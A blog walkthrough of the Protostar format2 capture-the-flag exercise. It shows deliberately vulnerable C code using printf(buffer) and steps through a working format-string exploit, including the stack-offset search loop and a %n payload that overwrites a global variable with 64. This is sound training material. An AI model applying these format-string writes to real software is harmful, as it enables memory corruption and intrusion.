Protostar exploits format2

Introduction

Protostar exploits are a cool bunch of ctf type exercises that focus on Linux  binary exploits that progressively get harder. A ISO containing the OS and challenges can be downloaded.

The website with all information and downloads is at https://exploit-exercises.com/protostar/

Challenge

Test run

user@protostar:~$ /opt/protostar/bin/format2
test
test
target is 0 :(

Exploit

Program should print the message “you have modified the target :)”.

This challenge is very similar to the previous challenge in that we need to use the format string vulnerability on the printf(buffer) call and use the $n modifier to overwrite the contents of ‘target’.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln()
{
 char buffer[512];

 fgets(buffer, sizeof(buffer), stdin);
 printf(buffer);
 
 if(target == 64) {
 printf("you have modified the target :)\n");
 } else {
 printf("target is %d :(\n", target);
 }
}

int main(int argc, char **argv)
{
 vuln();
}

If we can assign the ‘target’ variable the integer value 64 then the message should be printed.

Again we will use objdump -t option. This command will print the the binary’s symbol table. The symbol we want is the reference to the ‘target’ variable and it’s memory location.

user@protostar:~$ objdump -t /opt/protostar/bin/format2|grep target
080496e4 g O .bss 00000004 target

There we have it, ‘target’ should be located at memory address 0x080496e4.

Now we need to construct the exploit format string payload.

First step is to figure out which position on the stack is the ‘buffer’ variable stored.

user@protostar:~$ for i in {1..254}; do echo -e "AAAA%$i\$p-$i" |/opt/protostar/bin/format2;done |grep 0x41414141
AAAA0x41414141-4

I iterated from 1-254 to find the first part of the string of AAAA and it showed up at 4th position.

I tried to confirm this once more.

user@protostar:~$ /opt/protostar/bin/format2
AAAA%4$p
AAAA0x41414141
target is 0 :(

Definitely the 4th position.

The payload so far

AAAA%4$p

AAAA = start of the string parameter

%4 = Position on the stack that the ‘string’ (AAAA) variable is stored.

$p = This will print out the contents of the memory location at stack position 4.

All we need to do now is replace the AAAAs with the memory location of ‘target’ in reverse byte order and use the %n modifier to write to a memory location instead of printing the contents of the stack position. Something like \xe4\x96\x04\x08%4$n

\xe4\x96\x04\x08 = ‘target’ memory location in reverse byte order

%4 = Position on the stack that the ‘buffer’ (\xe4\x96\x04\x08 ) variable is stored.

$n = Write the string length (4 ‘\xe4\x96\x04\x08’) to the destination address specified by the stack position modifier %4

user@protostar:~$ echo -e "\xe4\x96\x04\x08%4\$n" |/opt/protostar/bin/format2
?
target is 4 :(

The program nicely confirms that ‘target’ variable contains the integer 4.

If the value 4 (because 4 bytes used for the string “\xe4\x96\x04\x08%4\”) is saved to the location specified by 0x080496e4 then how do we increase this value? Format strings allow you to increase the width/size of the string created (same technique used in format0 challenge) by specifying an unsigned integer %(int)u and this size value will be stored at the address of ‘target’.

Updated payload \xe4\x96\x04\x08%60u%4$n

\xe4\x96\x04\x08 = ‘target’ memory location in reverse byte order

%60u = This is an additional 60 bytes to append to the previous 4 bytes (\xe4\x96\x04\x08) giving the string a total of 64 bytes.

%4 = Position on the stack that the ‘buffer’ (\xe4\x96\x04\x08 ) variable is stored.

$n = Write the string length (‘\xe4\x96\x04\x08’ + ‘0x20’*60 = 64bytes) to the destination address specified by the stack position modifier %4

user@protostar:~$ echo -e "\xe4\x96\x04\x08%60u%4\$n" |/opt/protostar/bin/format2
                                                         512
you have modified the target :)

Thank you

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s